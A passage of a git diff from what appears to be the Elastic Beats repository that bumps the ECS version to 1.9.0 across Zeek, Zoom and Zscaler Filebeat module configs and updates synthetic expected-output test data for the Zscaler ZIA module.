a/x-pack/filebeat/module/zeek/rfb/config/rfb.yml +++ b/x-pack/filebeat/module/zeek/rfb/config/rfb.yml @@ -73,4 +73,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/signature/config/signature.yml b/x-pack/filebeat/module/zeek/signature/config/signature.yml index e6bef4d1a9d..a5a0015f310 100644 --- a/x-pack/filebeat/module/zeek/signature/config/signature.yml +++ b/x-pack/filebeat/module/zeek/signature/config/signature.yml @@ -47,4 +47,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/sip/config/sip.yml b/x-pack/filebeat/module/zeek/sip/config/sip.yml index 3530b53ce8b..6f726c62949 100644 --- a/x-pack/filebeat/module/zeek/sip/config/sip.yml +++ b/x-pack/filebeat/module/zeek/sip/config/sip.yml @@ -95,4 +95,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml index 7b0ba2dd6dc..97936f70544 100644 --- a/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml +++ b/x-pack/filebeat/module/zeek/smb_cmd/config/smb_cmd.yml @@ -101,4 +101,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml index aa530a6f0de..1490649b7cd 100644 --- a/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml +++ b/x-pack/filebeat/module/zeek/smb_files/config/smb_files.yml @@ -61,4 +61,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml index 414432e30a6..065b62277ff 100644 --- a/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml +++ b/x-pack/filebeat/module/zeek/smb_mapping/config/smb_mapping.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml index cf31baf7d0c..bb512551389 100644 --- a/x-pack/filebeat/module/zeek/smtp/config/smtp.yml +++ b/x-pack/filebeat/module/zeek/smtp/config/smtp.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml index b508ee874df..1a4e4582263 100644 --- a/x-pack/filebeat/module/zeek/snmp/config/snmp.yml +++ b/x-pack/filebeat/module/zeek/snmp/config/snmp.yml @@ -69,4 +69,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/socks/config/socks.yml b/x-pack/filebeat/module/zeek/socks/config/socks.yml index cc486a60c40..4affcb5a09c 100644 --- a/x-pack/filebeat/module/zeek/socks/config/socks.yml +++ b/x-pack/filebeat/module/zeek/socks/config/socks.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml index 14e673c3e04..e171128c335 100644 --- a/x-pack/filebeat/module/zeek/ssh/config/ssh.yml +++ b/x-pack/filebeat/module/zeek/ssh/config/ssh.yml @@ -76,4 +76,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml index cf3281a5d76..a2f80412b68 100644 --- a/x-pack/filebeat/module/zeek/ssl/config/ssl.yml +++ b/x-pack/filebeat/module/zeek/ssl/config/ssl.yml @@ -94,4 +94,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/stats/config/stats.yml b/x-pack/filebeat/module/zeek/stats/config/stats.yml index a8fcb0ce6b9..099027b910c 100644 --- a/x-pack/filebeat/module/zeek/stats/config/stats.yml +++ b/x-pack/filebeat/module/zeek/stats/config/stats.yml @@ -97,4 +97,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml index 167e7ea9569..44b6c7062c0 100644 --- a/x-pack/filebeat/module/zeek/syslog/config/syslog.yml +++ b/x-pack/filebeat/module/zeek/syslog/config/syslog.yml @@ -57,4 +57,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml index 35671bd15a4..229594da472 100644 --- a/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml +++ b/x-pack/filebeat/module/zeek/traceroute/config/traceroute.yml @@ -45,4 +45,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml index 8bf2bd3ed48..82886945a08 100644 --- a/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml +++ b/x-pack/filebeat/module/zeek/tunnel/config/tunnel.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/weird/config/weird.yml b/x-pack/filebeat/module/zeek/weird/config/weird.yml index 317001ec2e4..289e74d52da 100644 --- a/x-pack/filebeat/module/zeek/weird/config/weird.yml +++ b/x-pack/filebeat/module/zeek/weird/config/weird.yml @@ -56,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zeek/x509/config/x509.yml b/x-pack/filebeat/module/zeek/x509/config/x509.yml index 0f9b418e4fa..971c058c911 100644 --- a/x-pack/filebeat/module/zeek/x509/config/x509.yml +++ b/x-pack/filebeat/module/zeek/x509/config/x509.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml index 34f0d4a6a54..cde58f81b50 100644 --- a/x-pack/filebeat/module/zoom/webhook/config/webhook.yml +++ b/x-pack/filebeat/module/zoom/webhook/config/webhook.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zscaler/zia/config/input.yml b/x-pack/filebeat/module/zscaler/zia/config/input.yml index cf61c0a28f7..8e5928799a3 100644 --- a/x-pack/filebeat/module/zscaler/zia/config/input.yml +++ b/x-pack/filebeat/module/zscaler/zia/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json b/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json index f741ff36d9a..920448da59f 100644 --- a/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json +++ b/x-pack/filebeat/module/zscaler/zia/test/generated.log-expected.json @@ -26,8 +26,8 @@ "rci737.www5.example" ], "related.ip": [ - "10.176.10.114", - "10.206.191.17" + "10.206.191.17", + "10.176.10.114" ], "related.user": [ "sumdo" @@ -41,8 +41,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ntium", "rsa.misc.action": [ - "Blocked", - "pisciv" + "pisciv", + "Blocked" ], "rsa.misc.category": "umq", "rsa.misc.filter": "oremi", @@ -68,6 +68,7 @@ "url.original": "https://api.example.com/ivelitse/ritin.htm?utl=vol#amremap", "user.name": "sumdo", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -100,8 +101,8 @@ "eosquir5191.www.example" ], "related.ip": [ - "10.26.46.95", - "10.173.22.152" + "10.173.22.152", + "10.26.46.95" ], "related.user": [ "eataevi" @@ -115,8 +116,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "luptat", "rsa.misc.action": [ - "Allowed", - "tur" + "tur", + "Allowed" ], "rsa.misc.category": "eius", "rsa.misc.filter": "ameaqu", @@ -142,6 +143,7 @@ "url.original": "https://internal.example.net/isiutal/moenimi.jpg?gnaali=enatus#mquia", "user.name": "eataevi", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -176,8 +178,8 @@ "orsitame3262.domain" ], "related.ip": [ - "10.204.86.149", - "10.254.146.57" + "10.254.146.57", + "10.204.86.149" ], "related.user": [ "tenima" @@ -191,8 +193,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uptassi", "rsa.misc.action": [ - "Blocked", - "giatq" + "giatq", + "Blocked" ], "rsa.misc.category": "llu", "rsa.misc.filter": "tconsec", @@ -218,6 +220,7 @@ "url.original": "https://example.com/taspe/mvolu.gif?atcup=snos#iquaUte", "user.name": "tenima", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -267,8 +270,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ima", "rsa.misc.action": [ - "Allowed", - "llam" + "llam", + "Allowed" ], "rsa.misc.category": "aboris", "rsa.misc.filter": "atatnonp", @@ -294,6 +297,7 @@ "url.original": "https://api.example.org/doloreeu/pori.jpg?itati=mfu#uid", "user.name": "equun", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -328,8 +332,8 @@ "ore2933.www.test" ], "related.ip": [ - "10.136.153.149", - "10.61.78.108" + "10.61.78.108", + "10.136.153.149" ], "related.user": [ "ercit" @@ -343,8 +347,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "inim", "rsa.misc.action": [ - "Blocked", - "reetdolo" + "reetdolo", + "Blocked" ], "rsa.misc.category": "osquir", "rsa.misc.filter": "ipit", @@ -370,6 +374,7 @@ "url.original": "https://api.example.com/ele/tenbyCic.gif?porainc=amquisno#iinea", "user.name": "ercit", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -446,6 +451,7 @@ "url.original": "https://mail.example.org/sitas/ehenderi.jpg?atquovo=iumto#aboreetd", "user.name": "tessec", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -522,6 +528,7 @@ "url.original": "https://mail.example.net/aborumSe/luptat.txt?antiumto=strude#ctetura", "user.name": "xercitat", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -598,6 +605,7 @@ "url.original": "https://www5.example.net/ntutla/equa.jpg?civeli=errorsi#des", "user.name": "erc", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -647,8 +655,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "atquovo", "rsa.misc.action": [ - "Allowed", - "amvolup" + "amvolup", + "Allowed" ], "rsa.misc.category": "hil", "rsa.misc.filter": "deFinibu", @@ -674,6 +682,7 @@ "url.original": "https://api.example.net/atvol/umiur.txt?tati=utaliqu#oriosamn", "user.name": "quip", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -708,8 +717,8 @@ "sitvolup368.internal.host" ], "related.ip": [ - "10.135.225.244", - "10.71.170.37" + "10.71.170.37", + "10.135.225.244" ], "related.user": [ "atu" @@ -723,8 +732,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ihilm", "rsa.misc.action": [ - "psaquae", - "Allowed" + "Allowed", + "psaquae" ], "rsa.misc.category": "eFinib", "rsa.misc.filter": "inesci", @@ -750,6 +759,7 @@ "url.original": "https://mail.example.net/equep/iavolu.gif?aqu=rpo#uipe", "user.name": "atu", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -784,8 +794,8 @@ "ite2026.www.invalid" ], "related.ip": [ - "10.19.145.131", - "10.223.247.86" + "10.223.247.86", + "10.19.145.131" ], "related.user": [ "tNequepo" @@ -799,8 +809,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "sci", "rsa.misc.action": [ - "emseq", - "Allowed" + "Allowed", + "emseq" ], "rsa.misc.category": "exercit", "rsa.misc.filter": "taevit", @@ -826,6 +836,7 @@ "url.original": "https://example.org/bor/occa.htm?dol=leumiu#namali", "user.name": "tNequepo", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -860,8 +871,8 @@ "radipisc7020.home" ], "related.ip": [ - "10.181.80.139", - "10.2.53.125" + "10.2.53.125", + "10.181.80.139" ], "related.user": [ "ihilmo" @@ -902,6 +913,7 @@ "url.original": "https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos", "user.name": "ihilmo", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -978,6 +990,7 @@ "url.original": "https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn", "user.name": "ratvolu", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1012,8 +1025,8 @@ "piscin6866.internal.host" ], "related.ip": [ - "10.135.160.125", - "10.0.55.9" + "10.0.55.9", + "10.135.160.125" ], "related.user": [ "volupta" @@ -1027,8 +1040,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "iurer", "rsa.misc.action": [ - "Allowed", - "ionevo" + "ionevo", + "Allowed" ], "rsa.misc.category": "tinvolu", "rsa.misc.filter": "idex", @@ -1054,6 +1067,7 @@ "url.original": "https://www.example.org/eporr/xeacomm.html?aturQui=utlabor#rau", "user.name": "volupta", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -1088,8 +1102,8 @@ "spi3544.www.host" ], "related.ip": [ - "10.111.187.12", - "10.63.250.128" + "10.63.250.128", + "10.111.187.12" ], "related.user": [ "saute" @@ -1130,6 +1144,7 @@ "url.original": "https://internal.example.net/ptatemq/luptatev.html?Nequepo=ipsumd#ntocc", "user.name": "saute", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1164,8 +1179,8 @@ "tlab5981.www.host" ], "related.ip": [ - "10.252.124.150", - "10.5.126.127" + "10.5.126.127", + "10.252.124.150" ], "related.user": [ "inibusB" @@ -1206,6 +1221,7 @@ "url.original": "https://www5.example.com/tateve/itinvol.txt?tenatus=cipitlab#ipsumd", "user.name": "inibusB", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1240,8 +1256,8 @@ "upida508.example" ], "related.ip": [ - "10.201.171.120", - "10.91.126.231" + "10.91.126.231", + "10.201.171.120" ], "related.user": [ "exercita" @@ -1255,8 +1271,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "umdo", "rsa.misc.action": [ - "orumSe", - "Blocked" + "Blocked", + "orumSe" ], "rsa.misc.category": "tanimid", "rsa.misc.filter": "itam", @@ -1282,6 +1298,7 @@ "url.original": "https://api.example.net/tquiin/tse.jpg?ovol=ptasn#taedicta", "user.name": "exercita", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -1331,8 +1348,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "quid", "rsa.misc.action": [ - "itecto", - "Allowed" + "Allowed", + "itecto" ], "rsa.misc.category": "quam", "rsa.misc.filter": "adeser", @@ -1358,6 +1375,7 @@ "url.original": "https://mail.example.org/olor/ineavo.gif?mquelau=iadolor#amcol", "user.name": "str", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -1434,6 +1452,7 @@ "url.original": "https://www.example.com/its/ender.gif?oles=edic#seq", "user.name": "aturve", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -1510,6 +1529,7 @@ "url.original": "https://www5.example.org/oeni/tdol.gif?llamco=nea#psum", "user.name": "ulapar", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -1559,8 +1579,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "uaUten", "rsa.misc.action": [ - "Blocked", - "amcorp" + "amcorp", + "Blocked" ], "rsa.misc.category": "umdolor", "rsa.misc.filter": "velillu", @@ -1586,6 +1606,7 @@ "url.original": "https://www.example.com/uasiar/utlab.htm?loremqu=dantium#lor", "user.name": "lor", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -1635,8 +1656,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tdol", "rsa.misc.action": [ - "Allowed", - "nte" + "nte", + "Allowed" ], "rsa.misc.category": "adeseru", "rsa.misc.filter": "mac", @@ -1662,6 +1683,7 @@ "url.original": "https://api.example.org/icabo/gna.html?urerepr=eseru#quamest", "user.name": "snost", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", @@ -1738,6 +1760,7 @@ "url.original": "https://api.example.org/oremi/elites.html?iosa=boNemoe#onsequ", "user.name": "olori", "user_agent.device.name": "Pixel 3", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -1772,8 +1795,8 @@ "stenatu4844.www.invalid" ], "related.ip": [ - "10.24.111.229", - "10.39.31.115" + "10.39.31.115", + "10.24.111.229" ], "related.user": [ "fugi" @@ -1814,6 +1837,7 @@ "url.original": "https://example.com/luptatem/uaeratv.gif?dat=periam#dqu", "user.name": "fugi", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -1890,6 +1914,7 @@ "url.original": "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", "user.name": "boreetdo", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -1924,8 +1949,8 @@ "dquia107.www.test" ], "related.ip": [ - "10.128.173.19", - "10.88.172.34" + "10.88.172.34", + "10.128.173.19" ], "related.user": [ "agnaaliq" @@ -1939,8 +1964,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "ntNeq", "rsa.misc.action": [ - "dtempo", - "Blocked" + "Blocked", + "dtempo" ], "rsa.misc.category": "ipsu", "rsa.misc.filter": "iqu", @@ -1966,6 +1991,7 @@ "url.original": "https://api.example.com/ori/tconsect.html?ercit=eporroq#ulla", "user.name": "agnaaliq", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -2000,8 +2026,8 @@ "lloin4019.www.localhost" ], "related.ip": [ - "10.238.224.49", - "10.130.241.232" + "10.130.241.232", + "10.238.224.49" ], "related.user": [ "onse" @@ -2015,8 +2041,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "mnisiut", "rsa.misc.action": [ - "mod", - "Allowed" + "Allowed", + "mod" ], "rsa.misc.category": "uiinea", "rsa.misc.filter": "aturQu", @@ -2042,6 +2068,7 @@ "url.original": "https://api.example.org/rure/asiarchi.txt?loremeu=aturve#utfug", "user.name": "onse", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2076,8 +2103,8 @@ "tamet6317.www.host" ], "related.ip": [ - "10.115.53.31", - "10.2.67.127" + "10.2.67.127", + "10.115.53.31" ], "related.user": [ "Cic" @@ -2118,6 +2145,7 @@ "url.original": "https://example.com/emUte/molestia.htm?orroqu=elitsed#labore", "user.name": "Cic", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2152,8 +2180,8 @@ "saquaea6344.www.invalid" ], "related.ip": [ - "10.204.214.251", - "10.101.38.213" + "10.101.38.213", + "10.204.214.251" ], "related.user": [ "ueipsa" @@ -2167,8 +2195,8 @@ "rsa.investigations.ec_theme": "Communication", "rsa.investigations.event_vcat": "tasun", "rsa.misc.action": [ - "quasiarc", - "Allowed" + "Allowed", + "quasiarc" ], "rsa.misc.category": "autfugi", "rsa.misc.filter": "ritqu", @@ -2194,6 +2222,7 @@ "url.original": "https://mail.example.net/repreh/plic.jpg?utlabo=tetur#tionula", "user.name": "ueipsa", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2228,8 +2257,8 @@ "utaliqu4248.www.localhost" ], "related.ip": [ - "10.18.226.72", - "10.101.85.169" + "10.101.85.169", + "10.18.226.72" ], "related.user": [ "rroqu" @@ -2270,6 +2299,7 @@ "url.original": "https://api.example.com/tcu/iatqu.jpg?quovo=urExcep#ema", "user.name": "rroqu", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2346,6 +2376,7 @@ "url.original": "https://www5.example.com/apariatu/lorsita.gif?msequ=uat#lupta", "user.name": "stenatus", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 